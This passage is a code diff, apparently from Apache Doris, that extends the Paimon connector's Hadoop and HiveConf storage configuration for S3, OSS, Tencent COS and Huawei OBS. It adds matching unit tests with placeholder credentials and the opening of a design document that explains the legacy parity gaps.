"org.apache.hadoop.fs.obs.OBSFileSystem"; + private static final String OBS_NATIVE_ABSTRACT_IMPL = "org.apache.hadoop.fs.obs.OBS"; private PaimonCatalogFactory() { } @@ -412,6 +478,8 @@ public static Configuration buildHadoopConfiguration(Map props) private static void applyStorageConfig(Map props, BiConsumer setter) { applyCanonicalS3Config(props, setter); applyCanonicalOssConfig(props, setter); + applyCanonicalCosConfig(props, setter); + applyCanonicalObsConfig(props, setter); props.forEach((key, value) -> { for (String prefix : USER_STORAGE_PREFIXES) { if (key.startsWith(prefix)) { @@ -444,6 +512,30 @@ private static void applyCanonicalS3Config(Map props, BiConsumer if (ak == null && endpoint == null && region == null) { return; } + // Endpoint-from-region (legacy S3Properties.getEndpointFromRegion): a region-only AWS S3 catalog + // (no explicit endpoint) derives https://s3..amazonaws.com so the FE FileIO can resolve it. + if (StringUtils.isBlank(endpoint) && StringUtils.isNotBlank(region)) { + endpoint = "https://s3." + region + ".amazonaws.com"; + } + applyS3aBaseConfig(setter, ak, sk, token, endpoint, region, + firstNonBlankOrDefault(props, S3_DEFAULT_MAX_CONN, S3_MAX_CONN_ALIASES), + firstNonBlankOrDefault(props, S3_DEFAULT_REQ_TIMEOUT, S3_REQ_TIMEOUT_ALIASES), + firstNonBlankOrDefault(props, S3_DEFAULT_CONN_TIMEOUT, S3_CONN_TIMEOUT_ALIASES), + firstNonBlankOrDefault(props, DEFAULT_PATH_STYLE, S3_PATH_STYLE_ALIASES)); + } + + /** + * Port of legacy {@code AbstractS3CompatibleProperties.appendS3HdfsProperties} — the S3A base block that + * S3/OSS/COS/OBS all inherit via {@code super.initializeHadoopStorageConfig()}. The caller resolves the + * credentials AND the 4 tuning values from its OWN scheme aliases/defaults (so a pure-{@code oss.*} catalog + * never re-reads {@code s3.*} keys, and AWS S3 gets its 50/3000/1000 defaults while OSS/COS/OBS get + * 100/10000/10000); this helper only emits. {@code fs.s3a.endpoint}/{@code endpoint.region} are CONDITIONAL + * here — legacy emits them unconditionally via {@code Preconditions.checkNotNull}, but the connector has no + * {@code setRegionIfPossible} throw-guard, so it omits them when blank (matches the existing connector style). + */ + private static void applyS3aBaseConfig(BiConsumer setter, String ak, String sk, + String token, String endpoint, String region, String maxConnections, String requestTimeoutMs, + String connectionTimeoutMs, String usePathStyle) { setter.accept("fs.s3.impl", S3A_IMPL); setter.accept("fs.s3a.impl", S3A_IMPL); setter.accept("fs.s3.impl.disable.cache", "true"); @@ -462,6 +554,10 @@ private static void applyCanonicalS3Config(Map props, BiConsumer setter.accept("fs.s3a.session.token", token); } } + setter.accept("fs.s3a.connection.maximum", maxConnections); + setter.accept("fs.s3a.connection.request.timeout", requestTimeoutMs); + setter.accept("fs.s3a.connection.timeout", connectionTimeoutMs); + setter.accept("fs.s3a.path.style.access", usePathStyle); } /** @@ -481,6 +577,23 @@ private static void applyCanonicalOssConfig(Map props, BiConsume if (ak == null && endpoint == null && region == null) { return; } + // Endpoint-from-region (legacy OSSProperties.initNormalizeAndCheckProps -> getOssEndpoint): when no + // explicit oss.endpoint is given, derive oss-[-internal].aliyuncs.com. publicAccess defaults + // to false (=> -internal), sourced from dlf.access.public/dlf.catalog.accessPublic (the only legacy + // dlfAccessPublic aliases). This is the SAME derivation the DLF flavor used (its former DLF-local + // block in buildDlfHiveConf is now removed) and that the legacy HMS+OSS path got via OSSProperties.of(). + if (StringUtils.isBlank(endpoint) && StringUtils.isNotBlank(region)) { + boolean publicAccess = BooleanUtils.toBoolean( + firstNonBlank(props, "dlf.access.public", "dlf.catalog.accessPublic")); + endpoint = "oss-" + region + (publicAccess ? "" : "-internal") + ".aliyuncs.com"; + } + // Emit the S3A base too (legacy OSS inherits it via super.appendS3HdfsProperties) for s3://-over-OSS. + applyS3aBaseConfig(setter, ak, sk, token, endpoint, region, + firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_MAX_CONN, OSS_MAX_CONN_ALIASES), + firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_REQ_TIMEOUT, OSS_REQ_TIMEOUT_ALIASES), + firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_CONN_TIMEOUT, OSS_CONN_TIMEOUT_ALIASES), + firstNonBlankOrDefault(props, DEFAULT_PATH_STYLE, OSS_PATH_STYLE_ALIASES)); + // Jindo OSS keys (legacy OSSProperties.initializeHadoopStorageConfig). setter.accept("fs.oss.impl", JINDO_OSS_IMPL); setter.accept("fs.AbstractFileSystem.oss.impl", JINDO_OSS_ABSTRACT_IMPL); if (StringUtils.isNotBlank(ak)) { @@ -498,6 +611,74 @@ private static void applyCanonicalOssConfig(Map props, BiConsume } } + /** + * Translates the canonical {@code cos.*}/{@code s3.*} aliases into the {@code fs.cosn.*} keys the Tencent + * COS FileIO reads. Port of legacy {@code COSProperties.initializeHadoopStorageConfig}, which emits the S3A + * base via {@code super} FIRST, then the cosn keys. Detection mirrors legacy {@code COSProperties.guessIsMe} + * (endpoint/uri PATTERN, not the scheme key), augmented with the {@code cos.*} key signal: fire when any + * {@code cos.*} key is present OR a resolved endpoint/warehouse value contains {@code myqcloud.com}. The + * {@code fs.cosn.*} keys are emitted UNCONDITIONALLY (legacy parity — an empty value is written, not absent). + */ + private static void applyCanonicalCosConfig(Map props, BiConsumer setter) { + String endpoint = firstNonBlank(props, COS_ENDPOINT_ALIASES); + if (!anyKeyStartsWith(props, "cos.") + && !containsToken(endpoint, "myqcloud.com") + && !containsToken(props.get(PaimonConnectorProperties.WAREHOUSE), "myqcloud.com")) { + return; + } + String ak = firstNonBlank(props, COS_ACCESS_KEY_ALIASES); + String sk = firstNonBlank(props, COS_SECRET_KEY_ALIASES); + String region = firstNonBlank(props, COS_REGION_ALIASES); + String token = firstNonBlank(props, COS_SESSION_TOKEN_ALIASES); + applyS3aBaseConfig(setter, ak, sk, token, endpoint, region, + firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_MAX_CONN, COS_MAX_CONN_ALIASES), + firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_REQ_TIMEOUT, COS_REQ_TIMEOUT_ALIASES), + firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_CONN_TIMEOUT, COS_CONN_TIMEOUT_ALIASES), + firstNonBlankOrDefault(props, DEFAULT_PATH_STYLE, COS_PATH_STYLE_ALIASES)); + setter.accept("fs.cos.impl", S3A_IMPL); + setter.accept("fs.cosn.impl", S3A_IMPL); + setter.accept("fs.cosn.bucket.region", nullToEmpty(region)); + setter.accept("fs.cosn.userinfo.secretId", nullToEmpty(ak)); + setter.accept("fs.cosn.userinfo.secretKey", nullToEmpty(sk)); + } + + /** + * Translates the canonical {@code obs.*}/{@code s3.*} aliases into the {@code fs.obs.*} keys the Huawei OBS + * FileIO reads. Port of legacy {@code OBSProperties.initializeHadoopStorageConfig}: S3A base via {@code super} + * FIRST, then the obs keys, preferring the native {@code OBSFileSystem} when it is on the classpath, else the + * S3A fallback. Detection mirrors legacy {@code OBSProperties.guessIsMe}: any {@code obs.*} key OR a resolved + * endpoint/warehouse containing {@code myhuaweicloud.com}. The {@code fs.obs.*} keys are UNCONDITIONAL. + */ + private static void applyCanonicalObsConfig(Map props, BiConsumer setter) { + String endpoint = firstNonBlank(props, OBS_ENDPOINT_ALIASES); + if (!anyKeyStartsWith(props, "obs.") + && !containsToken(endpoint, "myhuaweicloud.com") + && !containsToken(props.get(PaimonConnectorProperties.WAREHOUSE), "myhuaweicloud.com")) { + return; + } + String ak = firstNonBlank(props, OBS_ACCESS_KEY_ALIASES); + String sk = firstNonBlank(props, OBS_SECRET_KEY_ALIASES); + String region = firstNonBlank(props, OBS_REGION_ALIASES); + String token = firstNonBlank(props, OBS_SESSION_TOKEN_ALIASES); + applyS3aBaseConfig(setter, ak, sk, token, endpoint, region, + firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_MAX_CONN, OBS_MAX_CONN_ALIASES), + firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_REQ_TIMEOUT, OBS_REQ_TIMEOUT_ALIASES), + firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_CONN_TIMEOUT, OBS_CONN_TIMEOUT_ALIASES), + firstNonBlankOrDefault(props, DEFAULT_PATH_STYLE, OBS_PATH_STYLE_ALIASES)); + // obs is not s3a-compatible; prefer the native OBSFileSystem when it is on the classpath (legacy + // OBSProperties.isClassAvailable). The connector's child-first loader delegates this non-plugin class + // to the host parent, so the answer matches legacy's. + if (isClassAvailable(OBS_NATIVE_IMPL)) { + setter.accept("fs.obs.impl", OBS_NATIVE_IMPL); + setter.accept("fs.AbstractFileSystem.obs.impl", OBS_NATIVE_ABSTRACT_IMPL); + } else { + setter.accept("fs.obs.impl", S3A_IMPL); + } + setter.accept("fs.obs.access.key", nullToEmpty(ak)); + setter.accept("fs.obs.secret.key", nullToEmpty(sk)); + setter.accept("fs.obs.endpoint", nullToEmpty(endpoint)); + } + /** * Builds the {@link HiveConf} for the {@code hms} flavor, reconstructed from the raw property * map. Replaces fe-core {@code HMSBaseProperties.getHiveConf()} minimally: sets all {@code hive.*} @@ -557,10 +738,24 @@ public static HiveConf buildHmsHiveConf(Map props, Map props, Map hiveConf.set(HADOOP_USER_NAME="hadoop.username", hmsUserName)): resolve the + // alias to hadoop.username, also after the storage overlay so the legacy @ConnectorProperty priority + // is authoritative (same raw hadoop.* passthrough clobber reason as the kerberos block). The bare + // pre-fix copyIfPresent also missed a user who set ONLY hive.metastore.username (it stayed an inert + // verbatim hive.* key). + String hmsUserName = firstNonBlank(props, "hive.metastore.username", "hadoop.username"); + if (StringUtils.isNotBlank(hmsUserName)) { + hiveConf.set("hadoop.username", hmsUserName); } - - // Overlay the storage config (legacy buildHiveConfiguration + appendUserHadoopConfig). - applyStorageConfig(props, hiveConf::set); return hiveConf; } @@ -661,18 +856,10 @@ public static HiveConf buildDlfHiveConf(Map props) { hiveConf.set("dlf.catalog.id", nullToEmpty(catalogId)); hiveConf.set("dlf.catalog.proxyMode", proxyMode); // Overlay the OSS storage config (legacy ossProps.getHadoopStorageConfig + appendUserHadoopConfig). + // The OSS endpoint-from-region derivation now lives in applyCanonicalOssConfig (shared with the + // filesystem/hms flavors, using the same dlf.access.public source), so no DLF-local derivation is + // needed here. applyStorageConfig(props, hiveConf::set); - // DLF parity: when the user supplied only a region (no explicit oss.endpoint), derive the OSS - // storage endpoint from it, mirroring legacy OSSProperties.getOssEndpoint(region, accessPublic). - // DLF users typically pass dlf.region/oss.region, not oss.endpoint. Kept DLF-local (not in the - // shared applyCanonicalOssConfig, which the filesystem flavor requires an explicit endpoint for). - if (StringUtils.isBlank(hiveConf.get("fs.oss.endpoint"))) { - String ossRegion = firstNonBlank(props, OSS_REGION_ALIASES); - if (StringUtils.isNotBlank(ossRegion)) { - hiveConf.set("fs.oss.endpoint", "oss-" + ossRegion - + (BooleanUtils.toBoolean(accessPublic) ? "" : "-internal") + ".aliyuncs.com"); - } - } return hiveConf; } @@ -708,4 +895,33 @@ private static void copyIfPresent(Map props, HiveConf hiveConf, private static String nullToEmpty(String s) { return s == null ? "" : s; } + + /** As {@link #firstNonBlank}, but returns {@code defaultValue} (not null) when no key is set. */ + private static String firstNonBlankOrDefault(Map props, String defaultValue, String... keys) { + String value = firstNonBlank(props, keys); + return value != null ? value : defaultValue; + } + + private static boolean anyKeyStartsWith(Map props, String prefix) { + for (String key : props.keySet()) { + if (key != null && key.startsWith(prefix)) { + return true; + } + } + return false; + } + + private static boolean containsToken(String value, String token) { + return value != null && value.contains(token); + } + + /** Whether {@code className} is loadable (legacy {@code OBSProperties.isClassAvailable} parity). */ + private static boolean isClassAvailable(String className) { + try { + Class.forName(className, false, PaimonCatalogFactory.class.getClassLoader()); + return true; + } catch (ClassNotFoundException e) { + return false; + } + } } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java index 7f647d8f53d410..83909f5fd0f5fd 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java @@ -418,6 +418,27 @@ public void buildHmsHiveConfKerberosAcceptsServicePrincipalAlias() { Assertions.assertEquals("true", hc.get("hive.metastore.sasl.enabled")); } + @Test + public void buildHmsHiveConfKerberosSurvivesSimpleHdfsAuthPassthrough() { + HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( + "uri", "thrift://nn:9083", + "hive.metastore.authentication.type", "kerberos", + "hive.metastore.client.principal", "doris@REALM", + "hive.metastore.client.keytab", "/etc/doris.keytab", + "hadoop.security.authentication", "simple")); + + // WHY (pre-existing MAJOR, found by the FIX-FECONF impl review): legacy runs initHadoopAuthenticator + // LAST, so a kerberized HMS forces hadoop.security.authentication=kerberos authoritatively even when + // the HDFS namenode uses simple auth (a real kerberized-HMS + simple-HDFS deployment). The connector's + // raw hadoop.* passthrough in applyStorageConfig re-copies the literal hadoop.security.authentication= + // simple, so if the kerberos block runs BEFORE the overlay the forced "kerberos" is clobbered back to + // "simple" while sasl.enabled stays "true" -> an inconsistent HiveConf that breaks the live GSSAPI + // handshake. The kerberos block must therefore run AFTER applyStorageConfig. MUTATION: kerberos block + // before the storage overlay -> hadoop.security.authentication clobbered to "simple" -> red. + Assertions.assertEquals("kerberos", hc.get("hadoop.security.authentication")); + Assertions.assertEquals("true", hc.get("hive.metastore.sasl.enabled")); + } + @Test public void buildHmsHiveConfSimpleDoesNotEnableSasl() { HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( @@ -765,4 +786,260 @@ public void buildHmsHiveConfSingleArgUsesEmptyResources() { Assertions.assertEquals("thrift://nn:9083", hc.get("hive.metastore.uris")); Assertions.assertEquals("10", hc.get("hive.metastore.client.socket.timeout")); } + + // --------------------------------------------------------------------- + // FIX-FECONF-STORAGE-PARITY — S3 endpoint-from-region + divergent tuning defaults + path-style + // --------------------------------------------------------------------- + + @Test + public void buildHadoopConfigurationDerivesS3EndpointFromRegion() { + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( + "s3.access_key", "ak", + "s3.secret_key", "sk", + "s3.region", "us-west-2")); + + // WHY (user-approved parity, same defect class as the OSS P8-1 fix): a region-only AWS S3 catalog + // (no explicit endpoint) must still derive an endpoint so the FE Paimon FileIO can resolve it; legacy + // S3Properties.getEndpointFromRegion returns https://s3..amazonaws.com. MUTATION: dropping the + // derivation leaves fs.s3a.endpoint null while fs.s3a.endpoint.region is set -> red. + Assertions.assertEquals("https://s3.us-west-2.amazonaws.com", conf.get("fs.s3a.endpoint")); + Assertions.assertEquals("us-west-2", conf.get("fs.s3a.endpoint.region")); + } + + @Test + public void buildHadoopConfigurationEmitsS3TuningDefaults() { + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( + "s3.endpoint", "s3.amazonaws.com", + "s3.region", "us-east-1")); + + // WHY (BLOCKER-class parity, caught only by the completeness critic): legacy appendS3HdfsProperties + // ALWAYS emits the 4 tuning keys, and the AWS-S3 field DEFAULTS are 50/3000/1000 (S3Properties), + // NOT the 100/10000/10000 the object stores use. A single shared default would silently mis-tune + // every AWS S3 paimon catalog. MUTATION: emitting no tuning keys (today) or the 100/10000/10000 + // object-store values for the S3 path -> red. + Assertions.assertEquals("50", conf.get("fs.s3a.connection.maximum")); + Assertions.assertEquals("3000", conf.get("fs.s3a.connection.request.timeout")); + Assertions.assertEquals("1000", conf.get("fs.s3a.connection.timeout")); + Assertions.assertEquals("false", conf.get("fs.s3a.path.style.access")); + } + + @Test + public void buildHadoopConfigurationEmitsS3PathStyleFromAlias() { + Configuration pathStyle = PaimonCatalogFactory.buildHadoopConfiguration(props( + "s3.endpoint", "minio:9000", + "s3.region", "us-east-1", + "use_path_style", "true")); + Configuration s3Alias = PaimonCatalogFactory.buildHadoopConfiguration(props( + "s3.endpoint", "minio:9000", + "s3.region", "us-east-1", + "s3.path-style-access", "true")); + + // WHY (P8-2/P9-3, MinIO/path-style): fs.s3a.path.style.access must be derived from either the + // use_path_style or s3.path-style-access alias; before the fix it was never emitted, so a MinIO / + // path-style bucket was hit virtual-hosted-style and failed. MUTATION: not reading the alias (always + // false) -> red. + Assertions.assertEquals("true", pathStyle.get("fs.s3a.path.style.access")); + Assertions.assertEquals("true", s3Alias.get("fs.s3a.path.style.access")); + } + + // --------------------------------------------------------------------- + // FIX-FECONF-STORAGE-PARITY — OSS endpoint-from-region (filesystem + hms) + S3A base + // --------------------------------------------------------------------- + + @Test + public void buildHadoopConfigurationDerivesOssEndpointFromRegion() { + Configuration internal = PaimonCatalogFactory.buildHadoopConfiguration(props( + "oss.access_key", "ak", + "oss.secret_key", "sk", + "oss.region", "cn-hangzhou")); + + // WHY (P8-1/P8-3): a filesystem-flavor OSS catalog with only a region (no explicit oss.endpoint) must + // derive the OSS endpoint, mirroring legacy OSSProperties.getOssEndpoint(region, dlfAccessPublic). The + // DEFAULT (dlfAccessPublic=false) is the -internal endpoint. Before the fix the derivation lived only + // in the DLF flavor, so a filesystem OSS catalog got fs.oss.endpoint=null -> FileIO could not resolve. + // MUTATION: no derivation for the filesystem path, or deriving the public form by default -> red. + Assertions.assertEquals("oss-cn-hangzhou-internal.aliyuncs.com", internal.get("fs.oss.endpoint")); + + Configuration pub = PaimonCatalogFactory.buildHadoopConfiguration(props( + "oss.access_key", "ak", + "oss.secret_key", "sk", + "oss.region", "cn-hangzhou", + "dlf.access.public", "true")); + // WHY: dlf.access.public=true selects the public (no -internal) form, even for a filesystem OSS + // catalog. MUTATION: ignoring the public flag on the shared OSS path -> red. + Assertions.assertEquals("oss-cn-hangzhou.aliyuncs.com", pub.get("fs.oss.endpoint")); + } + + @Test + public void buildHmsHiveConfDerivesOssEndpointFromRegion() { + HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( + "uri", "thrift://nn:9083", + "oss.access_key", "ak", + "oss.secret_key", "sk", + "oss.region", "cn-shanghai")); + + // WHY (parity completeness, RT-skeptic-3): moving the OSS endpoint-from-region derivation into the + // shared applyCanonicalOssConfig also grants the HMS flavor the same legacy OSSProperties.of() + // derivation it always had via fe-core. MUTATION: deriving only on the filesystem/dlf paths and not + // when applyStorageConfig is overlaid onto a HiveConf -> red. + Assertions.assertEquals("oss-cn-shanghai-internal.aliyuncs.com", hc.get("fs.oss.endpoint")); + } + + @Test + public void buildHadoopConfigurationEmitsS3aBaseForOssCatalog() { + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( + "oss.access_key", "oss-ak", + "oss.secret_key", "oss-sk", + "oss.endpoint", "oss-cn-hangzhou.aliyuncs.com")); + + // WHY (P8-1/P8-3, RT-skeptic-1/4): legacy OSS inherits the full S3A base via super.appendS3HdfsProperties + // (for s3://-over-OSS back-compat); before the fix applyCanonicalOssConfig emitted ONLY Jindo fs.oss.* + // keys. The S3A base must carry the OSS-resolved endpoint/creds (NOT re-resolved from s3.* aliases) and + // the OSS tuning default (100, NOT the S3 50). MUTATION: OSS block skipping the S3A base (fs.s3a.impl + // null), or emitting the S3 tuning default -> red. + Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", conf.get("fs.s3a.impl")); + Assertions.assertEquals("oss-ak", conf.get("fs.s3a.access.key")); + Assertions.assertEquals("oss-cn-hangzhou.aliyuncs.com", conf.get("fs.s3a.endpoint")); + Assertions.assertEquals("100", conf.get("fs.s3a.connection.maximum")); + // The Jindo OSS keys remain (unchanged behavior). + Assertions.assertEquals("com.aliyun.jindodata.oss.JindoOssFileSystem", conf.get("fs.oss.impl")); + Assertions.assertEquals("oss-ak", conf.get("fs.oss.accessKeyId")); + } + + // --------------------------------------------------------------------- + // FIX-FECONF-STORAGE-PARITY — COS / OBS (P9-2) + // --------------------------------------------------------------------- + + @Test + public void buildHadoopConfigurationEmitsCosKeysForCosCatalog() { + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( + "warehouse", "cosn://bucket/wh", + "cos.access_key", "cak", + "cos.secret_key", "csk", + "cos.endpoint", "cos.ap-beijing.myqcloud.com")); + + // WHY (P9-2): a cosn:// paimon catalog needs the Tencent COS FileSystem impl + cosn credentials; before + // the fix there was NO COS handling at all. fs.cosn.impl=S3AFileSystem makes cosn:// an S3A instance, so + // the S3A base (endpoint/creds, resolved from the cos.* aliases) is ALSO load-bearing. MUTATION: no COS + // block (fs.cosn.impl null), or not threading the cos.* creds into the S3A base -> red. + Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", conf.get("fs.cosn.impl")); + Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", conf.get("fs.cos.impl")); + Assertions.assertEquals("cak", conf.get("fs.cosn.userinfo.secretId")); + Assertions.assertEquals("csk", conf.get("fs.cosn.userinfo.secretKey")); + // S3A base carries the cos endpoint + creds + the object-store tuning default. + Assertions.assertEquals("cos.ap-beijing.myqcloud.com", conf.get("fs.s3a.endpoint")); + Assertions.assertEquals("cak", conf.get("fs.s3a.access.key")); + Assertions.assertEquals("100", conf.get("fs.s3a.connection.maximum")); + } + + @Test + public void buildHadoopConfigurationDetectsCosByEndpointPattern() { + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( + "warehouse", "cosn://bucket/wh", + "s3.access_key", "ak", + "s3.secret_key", "sk", + "s3.endpoint", "cos.ap-beijing.myqcloud.com")); + + // WHY (RT-skeptic-2, the framing fix): legacy detects COS by ENDPOINT PATTERN (myqcloud.com), NOT by a + // cos.* key. A cosn:// catalog configured with only s3.* keys + an s3.endpoint pointing at a myqcloud + // endpoint must STILL get fs.cosn.impl (a cos.*-key-only gate would miss it and the cosn:// warehouse + // would have no COS FileSystem impl). MUTATION: gating COS only on cos.* keys -> fs.cosn.impl null -> red. + Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", conf.get("fs.cosn.impl")); + Assertions.assertEquals("ak", conf.get("fs.cosn.userinfo.secretId")); + } + + @Test + public void buildHadoopConfigurationEmitsCosRegionUnconditionally() { + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( + "warehouse", "cosn://bucket/wh", + "cos.access_key", "cak", + "cos.secret_key", "csk", + "cos.endpoint", "cos.ap-beijing.myqcloud.com")); + + // WHY (RT-critic): legacy COSProperties writes fs.cosn.bucket.region UNCONDITIONALLY (even when blank), + // unlike the isNotBlank-guarded S3/OSS cred block — an empty key differs from an absent key for + // downstream Hadoop default resolution. MUTATION: guarding fs.cosn.bucket.region behind isNotBlank + // (absent when no region) -> red. + Assertions.assertEquals("", conf.get("fs.cosn.bucket.region")); + } + + @Test + public void buildHadoopConfigurationEmitsObsKeysForObsCatalog() { + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( + "warehouse", "obs://bucket/wh", + "obs.access_key", "oak", + "obs.secret_key", "osk", + "obs.endpoint", "obs.cn-north-4.myhuaweicloud.com")); + + // WHY (P9-2): an obs:// paimon catalog needs the Huawei OBS FileSystem impl + obs credentials; before + // the fix there was NO OBS handling. The impl is native OBSFileSystem when classpath-available, else the + // S3A fallback (classpath-dependent, so accept either), but the creds/endpoint are load-bearing. + // MUTATION: no OBS block (fs.obs.access.key null) -> red. + String obsImpl = conf.get("fs.obs.impl"); + Assertions.assertTrue("org.apache.hadoop.fs.obs.OBSFileSystem".equals(obsImpl) + || "org.apache.hadoop.fs.s3a.S3AFileSystem".equals(obsImpl), + "fs.obs.impl must be the native OBS impl or the S3A fallback, got: " + obsImpl); + Assertions.assertEquals("oak", conf.get("fs.obs.access.key")); + Assertions.assertEquals("osk", conf.get("fs.obs.secret.key")); + Assertions.assertEquals("obs.cn-north-4.myhuaweicloud.com", conf.get("fs.obs.endpoint")); + } + + @Test + public void buildHadoopConfigurationDetectsObsByEndpointPattern() { + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( + "warehouse", "obs://bucket/wh", + "s3.access_key", "ak", + "s3.secret_key", "sk", + "s3.endpoint", "obs.cn-north-4.myhuaweicloud.com")); + + // WHY (RT-skeptic-2): legacy detects OBS by the myhuaweicloud.com endpoint pattern, not an obs.* key. + // An obs:// catalog with only s3.* keys must still get fs.obs.*. MUTATION: obs.*-key-only gate -> red. + Assertions.assertNotNull(conf.get("fs.obs.impl")); + Assertions.assertEquals("ak", conf.get("fs.obs.access.key")); + } + + @Test + public void buildHadoopConfigurationDoesNotEmitCosOrObsForPlainS3() { + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( + "warehouse", "s3://bucket/wh", + "s3.access_key", "ak", + "s3.secret_key", "sk", + "s3.endpoint", "s3.us-east-1.amazonaws.com")); + + // WHY (RT-skeptic-2, negative parity): a plain AWS S3 catalog (no cos./obs. key, no myqcloud/ + // myhuaweicloud endpoint) must NOT trigger the COS or OBS blocks. MUTATION: a detection gate that + // fires COS/OBS on shared s3.* keys -> fs.cosn.impl/fs.obs.impl emitted for a pure-S3 catalog -> red. + Assertions.assertNull(conf.get("fs.cosn.impl")); + Assertions.assertNull(conf.get("fs.obs.impl")); + Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", conf.get("fs.s3a.impl")); + } + + // --------------------------------------------------------------------- + // FIX-FECONF-STORAGE-PARITY — HMS username alias (P8-4) + // --------------------------------------------------------------------- + + @Test + public void buildHmsHiveConfResolvesUsernameFromHiveMetastoreUsernameAlias() { + HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( + "uri", "thrift://nn:9083", + "hive.metastore.username", "hms-user")); + + // WHY (P8-4): legacy HMSBaseProperties binds the username from {hive.metastore.username, hadoop.username} + // and sets HADOOP_USER_NAME (= "hadoop.username"). Before the fix the connector only copied the literal + // hadoop.username, so a user who set ONLY hive.metastore.username had it land as an inert verbatim hive.* + // key and never reach hadoop.username (the UGI key). MUTATION: dropping the alias resolution -> null -> red. + Assertions.assertEquals("hms-user", hc.get("hadoop.username")); + } + + @Test + public void buildHmsHiveConfUsernameAliasPriorityHiveMetastoreWins() { + HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( + "uri", "thrift://nn:9083", + "hive.metastore.username", "primary", + "hadoop.username", "secondary")); + + // WHY: legacy alias order lists hive.metastore.username FIRST, so it wins when both are set. + // MUTATION: reversing the priority (hadoop.username wins) -> red. + Assertions.assertEquals("primary", hc.get("hadoop.username")); + } } diff --git a/plan-doc/FIX-FECONF-STORAGE-PARITY-design.md b/plan-doc/FIX-FECONF-STORAGE-PARITY-design.md new file mode 100644 index 00000000000000..c9ba27db78dbb0 --- /dev/null +++ b/plan-doc/FIX-FECONF-STORAGE-PARITY-design.md @@ -0,0 +1,215 @@ +# FIX-FECONF-STORAGE-PARITY — design + +> Cluster: P8-1 / P8-2 / P8-3 / P8-4 / P9-2 / P9-3 (round-3 re-review). User-signed **FULL legacy parity**. +> Pure **connector-only** change (`PaimonCatalogFactory.java` + its test). No fe-core / SPI / BE. +> Design red-team (`wf_a6385c61-669`, 5 skeptics + completeness critic) ran **before** this doc; its findings +> are folded in below (each marked **[RT]**). S3-endpoint-from-region inclusion is **user-approved** (2026-06-12). + +## Problem + +The connector cannot import fe-core, so `PaimonCatalogFactory` rebuilds the FE-side Hadoop +`Configuration` / `HiveConf` from the raw property map with **literal** key logic (same pattern as the +existing `applyCanonicalS3Config` / `applyCanonicalOssConfig`). That reconstruction is **incomplete** vs +the legacy `*Properties` classes, so a paimon catalog on several storage backends fails FE-side +catalog/metadata access (the live `FileSystemCatalog` / `HiveCatalog` / `JdbcCatalog` cannot resolve the +storage FileIO). Consumers of the gap: `buildHadoopConfiguration` (filesystem, jdbc), `buildHmsHiveConf` +(hms), `buildDlfHiveConf` (dlf) — all route through `applyStorageConfig`. + +Concrete gaps: +- **P8-1 / P8-3 (OSS)**: a region-only OSS catalog (no explicit `oss.endpoint`) gets no `fs.oss.endpoint`; + and an OSS catalog gets none of the `fs.s3.impl` / `fs.s3a.*` base keys legacy emits (so `s3://`-over-OSS + back-compat breaks). +- **P8-2 / P9-3 (S3 path-style / MinIO)**: `applyCanonicalS3Config` never emits `fs.s3a.path.style.access` + nor the `fs.s3a.connection.maximum/request.timeout/timeout` tuning keys. +- **P9-2 (COS / OBS)**: there is **no** COS or OBS handling at all — a `cosn://` / `obs://` paimon catalog + gets no `fs.cosn.*` / `fs.obs.*` keys. +- **P8-4 (HMS username)**: `buildHmsHiveConf` only copies the literal `hadoop.username`; a user who sets the + `hive.metastore.username` alias has it land as an inert verbatim `hive.*` key, never reaching `hadoop.username`. +- **(user-approved, S3 endpoint-from-region)**: structurally identical to P8-1 — a region-only AWS-S3 + catalog gets no `fs.s3a.endpoint`. Legacy `S3Properties.getEndpointFromRegion` derives + `https://s3..amazonaws.com`. + +## Root Cause + +`applyStorageConfig` runs only two canonical blocks (`applyCanonicalS3Config`, `applyCanonicalOssConfig`), +each emitting a **subset** of what the corresponding legacy `*Properties.initializeHadoopStorageConfig` +(plus its `super.appendS3HdfsProperties` base) emits, and there is **no COS/OBS block**. Legacy details +(parity references; do not modify these files): +- `AbstractS3CompatibleProperties.appendS3HdfsProperties` (the shared S3A base, inherited by S3/OSS/COS/OBS + via `super`): `fs.s3.impl`, `fs.s3a.impl`, `fs.s3{,a}.impl.disable.cache=true`, `fs.s3a.endpoint`, + `fs.s3a.endpoint.region`, creds (gated on `isNotBlank(accessKey)`), **`fs.s3a.connection.maximum`, + `fs.s3a.connection.request.timeout`, `fs.s3a.connection.timeout`, `fs.s3a.path.style.access`**. +- **[RT — critic, missed by all skeptics]** the 4 tuning **defaults are 